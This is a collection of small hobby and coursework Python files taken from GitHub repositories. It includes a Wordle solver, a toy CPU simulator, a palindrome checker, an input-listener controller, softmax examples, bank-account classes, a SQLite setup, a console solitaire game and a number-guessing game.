+{"seq_id":"71040233231","text":"\"\"\"\nLoad the contents of the file into the list.\n\n\nWhat am I trying to accomplish?\n\n1. Given an input, tell me the list of words that are probable candidates.\n2. From that\n\"\"\"\n\n# Let's filter out the 5 letter words to begin with.\n\nfrom collections import defaultdict\n\ndef get_all_words():\n    \"\"\"\n    Return the list of strings in the dictionary\n    :return:\n    \"\"\"\n    with open('words.txt', 'r') as file:\n        data = file.read().rstrip()\n    return data.split('\\n')\n\nlowercase_letters = \"abcdefghijklmnopqrstuvwxyz\"\n\ndef is_lower_case_word(word):\n    \"\"\"\n    Return true if all the letters in word are lowercase alphabets\n    :param word:\n    :return:\n    \"\"\"\n    for a in word:\n        if a not in lowercase_letters:\n            return False\n    return True\n\n\ndef filter_valid_words(list_of_words):\n    list_of_words = map(lambda x: x.lower(), list_of_words)\n\n    return [a for a in filter(lambda x: len(x) == 5 and is_lower_case_word(x),\n                              list_of_words)]\n\n\n\"\"\"\nAm here to solve for wordle.\nI should be able to guess the word in the quickest manner possible.\nFirst guess should be to get the most amount of information.\nOnce the information is fed in,\nMake the next guess in such a way that you again get the most amount of \ninformation.\n\n\n\"\"\"\n\ndef word_passes_the_sieve(possible_wordle, sieve):\n    # honor all the conditions of the sieve\n    # If one of the conditions fails, return false.\n    for typ, letter, position in sieve:\n        if typ == \"g\":\n            cur_flag = (possible_wordle[position - 1] == letter)\n        elif typ == 'y':\n            cur_flag = (letter in possible_wordle) and (possible_wordle[\n                position - 1] != letter)\n        else:\n            cur_flag = (letter not in possible_wordle)\n        if not cur_flag:\n            return False\n    return True\n\n\ndef update_wordles_sieve(possible_wordles, sieve):\n    ret = []\n    for possible_wordle in possible_wordles:\n        if word_passes_the_sieve(possible_wordle, sieve):\n            ret.append(possible_wordle)\n    return ret\n\n\nclass PossibleWordles():\n    def __init__(self, possible_wordles):\n        self.possible_wordles = possible_wordles\n        \"\"\"\n        Let's just use the strategy of using the words that have the most \n        character
character count.\n \"\"\"\n self.char_count = self.construct_char_count(self.possible_wordles)\n self.ranked_wordles = self.rank_wordles_based_on_count(\n self.possible_wordles, self.char_count)\n\n @staticmethod\n def rank_wordles_based_on_count(possible_wordles, char_count):\n ranked_wordles = [] # tuple of (score, word)\n \"\"\"\n Score is the sum of char counts of the unique letters in the word.\n \"\"\"\n for wordle in possible_wordles:\n score = 0\n for letter in set(wordle):\n score += char_count[letter]\n ranked_wordles.append((score, wordle))\n return sorted(ranked_wordles, key=lambda x: x[0], reverse=True)\n\n\n @staticmethod\n def construct_char_count(possible_wordles):\n char_count = defaultdict(int)\n for wordle in possible_wordles:\n for letter in set(wordle):\n char_count[letter] = char_count[letter] + 1\n return char_count\n\n def get_ranked_wordles(self):\n return self.ranked_wordles\n\n\ndef update_sieve(guess, colours, sieve):\n for i in range(0, 5):\n letter = guess[i]\n colour = colours[i]\n sieve.append((colour, letter, i + 1 if colour != 'b' else 0))\n\n\"\"\"\nFor now what I want is that, given a list of words, what is the best word to guess,\nso that I am able to narrow down to the exact word as fast as possible.\n\nThe goal is to narrow down the sieve very effeciently.\n\nEffective score of the word should be computed.\nThe definition of the effective score is that:\n The expected number of words that will be in the list post this guess. The word that has the minimum score is the best guess.\n For a given word the expected number of words that will be in the list post the guess will be as follows:\n 1. All I know is that any of the words in the sieve is a probable candidate.\n If the word x is the answer, what is the score of the word y?\n Over all possible combinations, which word reduced the sieve by a lot? Something to think about.\n Wordle isn't adding quite a bit of value at this point in time. 
But you are pondering over it for some reason.\n \n \n \n\"\"\"\n\n\ndef main():\n all_words = get_all_words()\n wordles = filter_valid_words(all_words)\n possible_wordles = wordles\n sieve = [] # character to the position or 'y' or 'n'\n while True:\n guess = str(input())\n if guess == \"done\":\n break\n else:\n colours = str(input())\n update_sieve(guess, colours, sieve)\n\n possible_wordles = update_wordles_sieve(possible_wordles, sieve)\n wordles_container = PossibleWordles(possible_wordles)\n print(\"count \" + str(len(possible_wordles)))\n ranked_wordles = wordles_container.ranked_wordles\n for i in range(0, min(20, len(ranked_wordles))):\n print(ranked_wordles[i])\n\n\n\nmain()\n","repo_name":"ranji100/wordle","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25439170794","text":"#!/usr/bin/python3\n# pylint: disable=missing-function-docstring\n# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=too-many-instance-attributes\n# pylint: disable=invalid-name\n# pylint: disable=consider-using-f-string\n\nimport logging\nfrom collections import deque\nimport sys\n\nfrom typing import List, Tuple, Deque\n\nfrom isa import Opcode, read_code, STDOUT_PORT, STDIN_PORT, ops_gr, \\\n reversed_addr_instruction_code, \\\n reversed_io_instruction_code, \\\n reversed_branch_instruction_code\n\n\nclass RegisterUnit:\n registers: List[int]\n rd: int\n rs1: int\n rs2: int\n\n def __init__(self, registers_count: int) -> None:\n self.registers = [0] * registers_count\n self.rd = 0\n self.rs1 = 0\n self.rs2 = 0\n\n def latch_sel_rd(self, number: int):\n self.rd = number\n\n def latch_sel_rs1(self, number: int):\n self.rs1 = number\n\n def latch_sel_rs2(self, number: int):\n self.rs2 = number\n\n def get_rs1_data(self):\n return self.registers[self.rs1]\n\n def get_rs2_data(self):\n return self.registers[self.rs2]\n\n def set_rd_data(self, data):\n if self.rd != 0:\n self.registers[self.rd] = int(data)\n\n\nclass ALU:\n output: int\n a: int\n b: int\n _operations_ = {\n Opcode.ADD: lambda a, b: a + b,\n Opcode.SUB: lambda a, b: a - b,\n Opcode.MUL: lambda a, b: a * b,\n Opcode.DIV: lambda a, b: a // b,\n Opcode.REM: lambda a, b: a % b,\n }\n\n def __init__(self) -> None:\n self.output = 0\n self.a = 0\n self.b = 0\n\n def load(self, a: int, b: int):\n self.a = a\n self.b = b\n\n def compute(self, operation: Opcode) -> int:\n self.output = int(self._operations_[operation](self.a, self.b))\n return self.output\n\n\nclass BranchComparator:\n a: int\n b: int\n\n def __init__(self) -> None:\n self.a = 0\n self.b = 0\n\n def load(self, a: int, b: int):\n self.a = a\n self.b = b\n\n def compare(self) -> Tuple[bool, bool]:\n return self.a == self.b, self.a < self.b\n\n\nclass IO:\n input_buffer: deque\n\n def __init__(self, input_tokens: list) -> None:\n self.input_buffer = deque(input_tokens)\n self.output_buffer = deque()\n\n def eof(self):\n return not self.input_buffer\n\n def input(self):\n return self.input_buffer.popleft()\n\n def output(self, character):\n self.output_buffer.append(character)\n\n\nclass DataPath:\n memory: List[int]\n current_address: int\n instruction_pointer: int\n data_memory_size: int\n ru: RegisterUnit\n alu: ALU\n bc: BranchComparator\n io: IO\n\n immediately_generator: int\n current_instruction: Tuple[Opcode, List[int]]\n args: Deque[int]\n\n def __init__(self, data: List[int], 
data_memory_size: int, input_buffer: list):\n assert data_memory_size > 0, \"Data_memory size should be non-zero\"\n self.data_memory_size = data_memory_size\n self.memory = data\n self.current_data = 0\n self.current_address = 0\n self.instruction_pointer = 0\n self.io = IO([ord(token) for token in input_buffer])\n self.immediately_generator = 0\n self.current_instruction = Opcode.HALT, []\n self.args: deque[str]\n self.ru = RegisterUnit(5)\n self.alu = ALU()\n self.bc = BranchComparator()\n\n def select_instruction(self) -> Opcode:\n self.current_instruction = \\\n DataPath.decode_instruction(self.memory[self.instruction_pointer:self.instruction_pointer + 4])\n opcode, args = self.current_instruction\n self.args = deque(args)\n self.instruction_pointer += 4\n\n return opcode\n\n def latch_dest_reg_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rd(int(arg))\n\n def latch_rs1_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rs1(int(arg))\n\n def latch_rs2_from_instr(self):\n arg = self.args.popleft()\n self.ru.latch_sel_rs2(int(arg))\n\n def latch_imm_gen(self):\n self.immediately_generator = int(self.args.popleft())\n\n def latch_rs1_to_alu(self):\n self.alu.a = self.ru.get_rs1_data()\n\n def latch_rs2_to_alu(self):\n self.alu.b = self.ru.get_rs2_data()\n\n def latch_imm_to_alu(self):\n \"\"\"Загружает непосредственное значение в ALU\"\"\"\n self.alu.b = self.immediately_generator\n\n def compute_alu(self, opcode: Opcode):\n self.alu.compute(opcode)\n\n def latch_address_to_memory(self):\n \"\"\"Загружает целевой адрес в память\"\"\"\n self.current_address = self.ru.get_rs1_data()\n self.current_data = self.get_data_from_memory(self.current_address)\n\n def store_data_to_memory_from_reg(self):\n \"\"\"Загружает данные в память\"\"\"\n self.set_data_to_memory(self.ru.get_rs1_data(), self.ru.get_rs2_data())\n\n def store_data_to_memory_from_imm(self):\n \"\"\"Загружает данные в память\"\"\"\n self.set_data_to_memory(self.ru.get_rs1_data(), self.immediately_generator)\n\n def latch_address_to_memory_from_imm(self):\n self.current_address = self.immediately_generator\n self.current_data = self.get_data_from_memory(self.current_address)\n\n def latch_reg_from_memory(self):\n \"\"\"Значение из памяти перезаписывает регистр\"\"\"\n self.ru.set_rd_data(self.current_data)\n\n def latch_reg_from_alu(self):\n \"\"\"ALU перезаписывает регистр\"\"\"\n self.ru.set_rd_data(self.alu.output)\n\n def latch_program_counter(self):\n \"\"\"Перезаписывает значение PC из ImmGen\"\"\"\n self.instruction_pointer = self.immediately_generator\n\n def latch_regs_to_bc(self):\n \"\"\"Загружает регистры в Branch Comparator.\"\"\"\n self.bc.a, self.bc.b = \\\n self.ru.get_rs1_data(), self.ru.get_rs2_data()\n return self.bc.compare()\n\n def get_data_from_memory(self, address: int) -> int:\n x = 256\n return self.memory[address] * x ** 3 + self.memory[address + 1] * x ** 2 + \\\n self.memory[address + 2] * x + self.memory[address + 3]\n\n def set_data_to_memory(self, address: int, value: int):\n x = 256\n self.memory[address] = value // (x ** 3) % x\n self.memory[address + 1] = value // (x ** 2) % x\n self.memory[address + 2] = value // x % x\n self.memory[address + 3] = value % x\n\n def latch_instruct(self):\n opcode, _ = self.current_instruction\n if opcode is Opcode.JMP:\n self.latch_imm_gen()\n elif opcode is Opcode.LW and self.args[-1] == 2:\n self.latch_dest_reg_from_instr()\n self.latch_imm_gen()\n elif opcode is Opcode.LW:\n self.latch_dest_reg_from_instr()\n 
self.latch_rs1_from_instr()\n elif opcode is Opcode.SW:\n self.latch_rs1_from_instr()\n self.latch_rs2_from_instr()\n elif opcode is Opcode.SW and self.args[-1] == 2:\n self.latch_rs1_from_instr()\n self.latch_imm_gen()\n elif opcode in ops_gr[\"branch\"]:\n self.latch_rs1_from_instr()\n self.latch_rs2_from_instr()\n self.latch_imm_gen()\n elif opcode in ops_gr['arith']:\n self.latch_dest_reg_from_instr()\n self.latch_rs1_from_instr()\n if self.args[-1] == 2:\n self.latch_imm_gen()\n else:\n self.latch_rs2_from_instr()\n elif opcode is Opcode.IN:\n self.latch_dest_reg_from_instr()\n self.latch_imm_gen()\n elif opcode is Opcode.OUT:\n self.latch_rs1_from_instr()\n self.latch_imm_gen()\n\n @staticmethod\n def decode_instruction(instr: List[int]) -> Tuple[Opcode, List[int]]:\n assert len(instr) == 4, \"Invalid instruction len\"\n nimble = 2 ** 4\n\n bin_opcode = instr[0] // nimble\n \"\"\" HALT \"\"\"\n if bin_opcode == 0:\n return Opcode.HALT, []\n if bin_opcode == 1:\n args = [\n instr[1] // nimble, # register to io\n bytes_to_number(instr[2], instr[3]), # io port\n ]\n\n return reversed_io_instruction_code[instr[0] % nimble], args\n\n \"\"\" Arithmetic instructions \"\"\"\n if 2 <= bin_opcode <= 6:\n addressing_type = instr[0] % nimble\n args = [\n instr[1] // nimble, # res reg\n instr[1] % nimble, # reg1\n (bytes_to_number(instr[2], instr[3]) # number\n if addressing_type == 2\n else instr[2] // nimble), # reg2\n addressing_type,\n\n ]\n return reversed_addr_instruction_code[bin_opcode], args\n\n \"\"\" Mem-instructions \"\"\"\n if 7 <= bin_opcode <= 8:\n addressing_type = instr[0] % nimble\n args = [\n instr[1] // nimble, # res reg\n (bytes_to_number(instr[2], instr[3]) # number\n if addressing_type == 2\n else instr[1] % nimble), # reg1\n addressing_type,\n ]\n return reversed_addr_instruction_code[bin_opcode], args\n\n \"\"\" Branch instructions \"\"\"\n if bin_opcode == 15:\n bin_opcode_extension = instr[0] % nimble\n offset = bytes_to_number(instr[2], instr[3])\n args = list()\n if bin_opcode_extension == 0:\n args.append(offset)\n else:\n args.append(instr[1] // nimble) # reg1\n args.append(instr[1] % nimble) # reg2\n args.append(offset)\n\n return reversed_branch_instruction_code[bin_opcode_extension], args\n\n raise SyntaxError(f\"Unknown binary instruction: {instr}\")\n\n\ndef bytes_to_number(upper_byte: int, lower_byte: int):\n return upper_byte * 2 ** 8 + lower_byte\n\n\nclass ControlUnit:\n data_path: DataPath\n\n def __init__(self, data_path):\n self.data_path = data_path\n self._tick = 0\n\n def tick(self):\n \"\"\"Счётчик тактов процессора. 
 Called when moving on to the next tick.\"\"\"\n        logging.debug('%s', self)\n        self._tick += 1\n\n    def current_tick(self):\n        \"\"\"Return the current tick.\"\"\"\n        return self._tick\n\n    def decode_and_execute_instruction(self):\n        opcode = Opcode(self.data_path.select_instruction())\n        dp = self.data_path\n        dp.latch_instruct()\n        self.tick()\n\n        if opcode is Opcode.JMP:\n            dp.latch_program_counter()\n        elif opcode in ops_gr[\"branch\"]:\n            equals, less = dp.latch_regs_to_bc()\n            self.tick()\n            if any([\n                opcode is Opcode.BEQ and equals,\n                opcode is Opcode.BNE and not equals,\n                opcode is Opcode.BLT and less,\n                opcode is Opcode.BNL and not less,\n                opcode is Opcode.BGT and not less and not equals,\n                opcode is Opcode.BNG and (less or equals)\n            ]):\n                dp.latch_program_counter()\n        elif opcode is Opcode.LW and self.data_path.args[-1] == 2:\n            dp.latch_address_to_memory_from_imm()\n            self.tick()\n            dp.latch_reg_from_memory()\n        elif opcode is Opcode.LW:\n            dp.latch_address_to_memory()\n            self.tick()\n            dp.latch_reg_from_memory()\n        # as in latch_instruct, the immediate form is tested before the general case\n        elif opcode is Opcode.SW and self.data_path.args[-1] == 2:\n            dp.store_data_to_memory_from_imm()\n        elif opcode is Opcode.SW:\n            dp.store_data_to_memory_from_reg()\n        elif opcode in ops_gr[\"arith\"]:\n            if self.data_path.args[-1] == 2:\n                dp.latch_imm_to_alu()\n            else:\n                dp.latch_rs2_to_alu()\n            dp.latch_rs1_to_alu()\n            dp.compute_alu(opcode=opcode)\n            self.tick()\n            dp.latch_reg_from_alu()\n\n        elif opcode in ops_gr[\"io\"]:\n            if self.data_path.immediately_generator == STDOUT_PORT:\n                self.data_path.io.output(self.data_path.ru.get_rs1_data())\n                # TODO: move into a separate method inside DataPath\n            elif self.data_path.immediately_generator == STDIN_PORT:\n                if self.data_path.io.eof():\n                    raise EOFError\n                self.data_path.ru.set_rd_data(self.data_path.io.input())\n                # TODO: move into a separate method inside DataPath\n\n        elif opcode is Opcode.HALT:\n            raise StopIteration()\n\n        self.tick()\n\n    def __repr__(self):\n        state = \"{{TICK: {}, PC: {}, ADDR: {}, OUT: }}\".format(\n            self._tick,\n            self.data_path.instruction_pointer,\n            self.data_path.current_address\n            # self.data_path.output_buffer[0]\n        )\n\n        registers = \"{{[rd: {}, rs1: {}, rs2: {}, imm: {}] Regs {} }}\".format(\n            self.data_path.ru.rd,\n            self.data_path.ru.rs1,\n            self.data_path.ru.rs2,\n            self.data_path.immediately_generator,\n            f\"[{' '.join([str(reg) for reg in self.data_path.ru.registers])}]\"\n        )\n\n        opcode, args = self.data_path.current_instruction\n\n        action = \"{} {}\".format(\n            opcode, f\"[{' '.join([str(arg) for arg in args])}]\")\n        alu = \"ALU [a:{} b:{} output:{}]\".format(\n            self.data_path.alu.a, self.data_path.alu.b, self.data_path.alu.output)\n\n        return \"{} {} {} {} \".format(state, registers, alu, action)\n\n\ndef show_memory(data_memory) -> str:\n    data_memory_state = \"\"\n\n    for address, cell in enumerate(reversed(data_memory)):\n        cell = int(cell)\n        # binary representation == br\n        address = len(data_memory) - address - 1\n        cell_br = bin(cell)[2:]\n        address_br = bin(address)[2:]\n        cell_br = (8 - len(cell_br)) * \"0\" + cell_br\n        address_br = (10 - len(address_br)) * \"0\" + address_br\n        data_memory_state += f\"[{{{address:5}}}\\\n [{address_br:10}] -> [{cell_br:8}] = ({cell:10})\\n\"\n    return data_memory_state\n\n\ndef simulation(data: List[int], input_tokens, data_memory_size, limit):\n    \"\"\"Run the processor simulation.\n\n    The length of the run is bounded by the number of executed instructions.\n    \"\"\"\n    # logging.info(\"{ INPUT MESSAGE } [ `%s` ]\", \"\".join(input_tokens))\n    # logging.info(\"{ INPUT TOKENS } [ %s ]\", \",\".join(\n    #
     [str(ord(token)) for token in input_tokens]))\n\n    data_path = DataPath(data, data_memory_size, input_tokens)\n    control_unit = ControlUnit(data_path)\n    instr_counter = 0\n\n    try:\n        while True:\n            if instr_counter >= limit:\n                print(\"too long execution, increase limit!\")\n                break\n            control_unit.decode_and_execute_instruction()\n            instr_counter += 1\n    except EOFError:\n        logging.warning('Input buffer is empty!')\n    except StopIteration:\n        pass\n\n    return ''.join(map(chr, data_path.io.output_buffer)), instr_counter, \\\n           control_unit.current_tick(), show_memory(data_path.memory)\n\n\ndef main(args):\n    assert len(args) == 2, \\\n        \"Wrong arguments: machine.py <code_file> <input_file>\"\n    code_file, input_file = args\n\n    memory_data = read_code(code_file)\n\n    with open(input_file, encoding=\"utf-8\") as file:\n        input_text = file.read()\n        input_token = []\n        for char in input_text:\n            input_token.append(char)\n        input_token.append(chr(0))\n\n    output, instr_counter, ticks, data_memory_state = simulation(\n        memory_data,\n        input_tokens=input_token,\n        data_memory_size=250,\n        limit=12000\n    )\n    # logging.info(\"%s\", f\"Memory map is\\n{data_memory_state}\")\n\n    print(f\"Output is `{''.join(output)}`\")\n    print(f\"instr_counter: {instr_counter} ticks: {ticks}\")\n\n\nif __name__ == '__main__':\n    logging.getLogger().setLevel(logging.DEBUG)\n    main(sys.argv[1:])\n","repo_name":"farid03/csa-lab3","sub_path":"machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":16313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"31928408434","text":"from pilha import Pilha\n\nfrase = input(\"Escreva uma palavra ou frase: \")\n\npalavras = frase.split()\n\ndef isPalindromo(wr):\n    tam = len(wr)\n    fim = \".\"\n    mid = tam//2 # first half of the word\n    pilha = Pilha()\n    pilha.push(fim)\n\n    if (tam < 3):return False\n\n    for i in range(tam):\n        if i < mid:\n            pilha.push(wr[i])\n        elif tam%2 == 1 and i == mid:\n            continue # skip the middle character of odd-length words\n        else:\n            if pilha.peek() == wr[i]:\n                pilha.pop()\n            else:\n                return False\n\n    return (pilha.peek()==fim)\n\nquant = 0\nsaida=\"\"\n\nfor w in palavras:\n    p = isPalindromo(w)\n    if p:\n        quant += 1\n        saida = saida + str(\"[\"+w+\"] \")\n    else:saida = saida + w + \" \"\n\nprint(\"Tem {0} palindromo\".format(quant))\nprint(saida)\n\n\"\"\"\n\ndef isPrimo(n):\n    for _ in range(2,n):\n        if _>=n:return True\n        elif n%_ < 1:return False\n    return True\n\n\nfor i in range(2,1000):\n    x=isPrimo(i)\n    if x:\n        print(i)\n\"\"\"","repo_name":"laelMatos/AutomatoDePilha","sub_path":"AtomatoDePilha.py","file_name":"AtomatoDePilha.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"73543092430","text":"from pynput import keyboard, mouse\n\nfrom hades.controller.base import Controller\nfrom hades.lib import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass InputController(Controller):\n\n    def __init__(self):\n        from hades.controller.callback import noop, on_click, on_press, on_release\n        self.listeners = [\n            keyboard.Listener(\n                on_press=on_press,\n                on_release=on_release,\n            ),\n            mouse.Listener(\n                on_move=noop,\n                on_click=on_click,\n                on_scroll=noop,\n            ),\n        ]\n\n    def start(self):\n        for listener in self.listeners:\n            listener.start()\n            listener.wait()\n\n    def stop(self):\n        for listener in self.listeners:\n            listener.stop()\n\n    @property\n    def running(self):\n        return all([listener.running for listener in self.listeners])\n\n\ninput_controller =
 InputController()\n","repo_name":"JELGT2011/hades","sub_path":"hades/controller/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"27107048735","text":"import numpy as np\n\ndef softmax(a):\n    exp_a = np.exp(a)\n    sum_exp_a = np.sum(exp_a)\n    y = exp_a / sum_exp_a\n\n    return y\n\na=np.array([0.3,2.9,4.0])\n\nprint(softmax(a))\n#[0.01821127 0.24519181 0.73659691]\n\n\n# [Problem] very large inputs such as e**1000 overflow to inf, so this version has limits and needs improvement!\n# Fix: writing out the formula shows that adding or subtracting the same constant from every element leaves softmax unchanged, so subtract the maximum\n\ndef softmax2(a):\n    c=np.max(a)\n    exp_a = np.exp(a-c)\n    sum_exp_a = np.sum(exp_a)\n    y = exp_a / sum_exp_a\n\n    return y\n\nb=np.array([1000,1010,990])\nprint(softmax(b))\nprint(softmax2(b))\n\n# [nan nan nan]\n# [4.53978686e-05 9.99954600e-01 2.06106005e-09]\n# Fixed!\n\n\n# softmax properties\n# 1. every output lies between 0 and 1.0\n# 2. the outputs sum to 1\n# >>> so they can be interpreted as probabilities","repo_name":"chminsta/DeepLearning_fromScratch","sub_path":"NEURAL_NETWORK3.PY","file_name":"NEURAL_NETWORK3.PY","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"15497396167","text":"from banco.banco import Banco\nfrom cliente.cliente import Cliente\nfrom conta.contacorrente import ContaCorrente\nfrom conta.contapoupanca import ContaPoupanca\n\nbanco = Banco()\n\ncliente1 = Cliente('Marcos', 25)\ncliente2 = Cliente('Paulo', 26)\ncliente3 = Cliente('Maria', 32)\n\nconta1 = ContaPoupanca(1111, 254136, 0)\nconta2 = ContaCorrente(2222, 254137, 0)\nconta3 = ContaPoupanca(1212, 254138, 0)\n\ncliente1.conta = conta1\ncliente2.conta = conta2\ncliente3.conta = conta3\n\nbanco.inserir_clientes(cliente1)\nbanco.inserir_conta(conta1)\n\nbanco.inserir_clientes(cliente2)\nbanco.inserir_conta(conta2)\n\nif banco.autenticar(cliente1):\n    cliente1.conta.depositar(0)\n    cliente1.conta.sacar(20)\nelse:\n    print('Cliente não autenticado.')\n\nprint('####################')\n\nif banco.autenticar(cliente2):\n    cliente2.conta.depositar(0)\n    cliente2.conta.sacar(20)\nelse:\n    print('Cliente não autenticado.')\n","repo_name":"santosbpm/projetos_curso_python","sub_path":"01_ContaBancaria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"25816421705","text":"DATABASE = \"database.db\"\r\nimport os, sqlite3\r\n\r\ndef open_db(db = DATABASE):\r\n    with sqlite3.connect(db) as con:\r\n        return con\r\n    \r\ndef init_database(db = DATABASE):\r\n    con = open_db(db)\r\n    con.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY, name TEXT, age INTEGER)\")\r\n    con.close()\r\n\r\nif os.path.exists(DATABASE):\r\n    print (\"Database exists, moving on...\")\r\nelse:\r\n    print (\"Database does not exist, creating...\")\r\n    init_database(DATABASE)","repo_name":"NgoThanhHieu/Python-4C","sub_path":"Flask/DB/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"71620317390","text":"from clint.textui import puts, colored, indent, columns, prompt\r\n\r\nfrom .Stack import Foundation, Stock, Column\r\nfrom .Deck import Deck\r\nfrom .Card import Suit, Rank, Color\r\n\r\n_NUM_COLUMNS = 7\r\n\r\n\r\nclass Game:\r\n\r\n    def __init__(self):\r\n        self.setup()\r\n        self.print()\r\n\r\n        # Start game\r\n        self.game_loop()\r\n\r\n    def _error(self, error):
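\r\n        \"\"\"Print an error message highlighted in magenta.\"\"\"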
\r\n        puts(colored.magenta(error, False, True))\r\n\r\n    def _is_int(self, string):\r\n        try:\r\n            int(string)\r\n        except:\r\n            return False\r\n        return True\r\n\r\n    def _validate_index(self, index):\r\n        if index < 0 or index >= len(self.columns):\r\n            return False\r\n        return True\r\n\r\n    def game_loop(self):\r\n        while True:\r\n            command = prompt.query('>')\r\n            if command == 'restart':\r\n                self.setup()\r\n                self.print()\r\n            elif command == 'print':\r\n                self.print()\r\n            elif command == 'help':\r\n                puts('Pile Ids:')\r\n                for pile_id, pile in self.ids_to_piles.items():\r\n                    puts(colored.blue(\"%s: \" % pile_id) + pile.name)\r\n                puts('All commands:')\r\n                with indent(3, '>'):\r\n                    puts(colored.cyan('restart') + ': restarts the game.')\r\n                    puts(colored.cyan('print') + ': print the current state of the board.')\r\n                    puts(colored.cyan('draw') + ': draw a card from stock.')\r\n                    puts(colored.cyan('mv x y') + ': moves the top card from pile x to pile y, where x and y are pile ids.')\r\n                    puts(colored.cyan('discard') + ': puts the top card of the stock pile into discards.')\r\n                    puts(colored.cyan('quit') + ': quits the game.')\r\n            elif command == 'draw':\r\n                self.stock.draw()\r\n                self.print()\r\n            elif command.startswith('mv'):\r\n                params = command.split(' ')\r\n                if len(params) != 3:\r\n                    self._error('Invalid: mv must have 2 params.')\r\n                elif not self.ids_to_piles.get(params[1], False) or not self.ids_to_piles.get(params[2], False):\r\n                    self._error('Invalid: params must be valid ids. Type ' + colored.cyan('help') + ' to see the list of valid ids.')\r\n                else:\r\n                    move_from = self.ids_to_piles[params[1]]\r\n                    move_to = self.ids_to_piles[params[2]]\r\n                    if not move_from.move_top_to(move_to):\r\n                        self._error('Invalid play.')\r\n                    else:\r\n                        self.print()\r\n                        win = True\r\n                        for _, foundation in self.foundations.items():\r\n                            if not foundation.full:\r\n                                win = False\r\n                                break\r\n\r\n                        if win:\r\n                            puts(colored.green('Congratulations, you have won the game!'))\r\n                            again = prompt.query('Type \"y\" to play again!')\r\n                            if again == 'y':\r\n                                self.setup()\r\n                            else:\r\n                                break\r\n            elif command == 'quit':\r\n                break\r\n            else:\r\n                self._error('Invalid command.')\r\n                puts('Type ' + colored.cyan('help') + ' to see all available commands.')\r\n\r\n    def setup(self):\r\n        self.deck = Deck()\r\n        self.deck.shuffle()\r\n\r\n        # Setup foundations\r\n        self.foundations = dict()\r\n        self.foundations[Suit.HEART] = Foundation(Suit.HEART)\r\n        self.foundations[Suit.DIAMOND] = Foundation(Suit.DIAMOND)\r\n        self.foundations[Suit.CLUB] = Foundation(Suit.CLUB)\r\n        self.foundations[Suit.SPADE] = Foundation(Suit.SPADE)\r\n\r\n        # Setup column piles\r\n        self.columns = []\r\n        for i in range(_NUM_COLUMNS):\r\n            self.columns.append(Column(i + 1))\r\n\r\n        # Deal cards\r\n        for start_index in range(_NUM_COLUMNS):\r\n            next_card = self.deck.get_next()\r\n            next_card.flip()\r\n            self.columns[start_index].deal(next_card)\r\n            for index in range(start_index + 1, _NUM_COLUMNS):\r\n                next_card = self.deck.get_next()\r\n                self.columns[index].deal(next_card)\r\n\r\n        # Setup stock pile\r\n        self.stock = Stock()\r\n        card = self.deck.get_next()\r\n        while card:\r\n            card.flip()\r\n            self.stock.place(card)\r\n            card = self.deck.get_next()\r\n\r\n        # Setup ids\r\n        self.ids_to_piles = {\r\n            'st': self.stock,\r\n            '1': self.columns[0],\r\n            '2': self.columns[1],\r\n            '3': self.columns[2],\r\n            '4': self.columns[3],\r\n            '5': self.columns[4],\r\n            '6': self.columns[5],\r\n            '7': self.columns[6],\r\n            'h': self.foundations[Suit.HEART],\r\n            'd': self.foundations[Suit.DIAMOND],\r\n            'c': self.foundations[Suit.CLUB],
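\r\n            # foundation piles are keyed by their suit initial ('h', 'd', 'c', 's')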
\r\n            's': self.foundations[Suit.SPADE]\r\n        }\r\n\r\n    def print(self):\r\n        puts(colored.blue(\"Stock: \", False, True) + self.stock.print())\r\n        for index, column in enumerate(self.columns):\r\n            puts(colored.blue(\"Column %d: \" % (index + 1)) + column.print())\r\n        for key, foundation in self.foundations.items():\r\n            puts(colored.blue(\"%s: \" % key.name) + foundation.print())","repo_name":"boyuantan/kleiner-perkins-2019","sub_path":"solitaire/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"12531891746","text":"import random\n\ndef hw_week7(secret_number):\n    y=int(0)\n    while True:\n        y=y+1\n        print('Take a guess.')\n        x=int(input())\n        if secret_number > x:\n            print('Your guess is too low.')\n        elif secret_number < x:\n            print('Your guess is too high.')\n        else:\n            print('Good job! You guessed my number in '+ str(y) +' guesses!')\n            break\n\nif __name__ == '__main__':\n    hw_week7(random.randint(1, 100))","repo_name":"KorenixTechnology/python-lesson-week7-AllenLyu210","sub_path":"hw_week7.py","file_name":"hw_week7.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
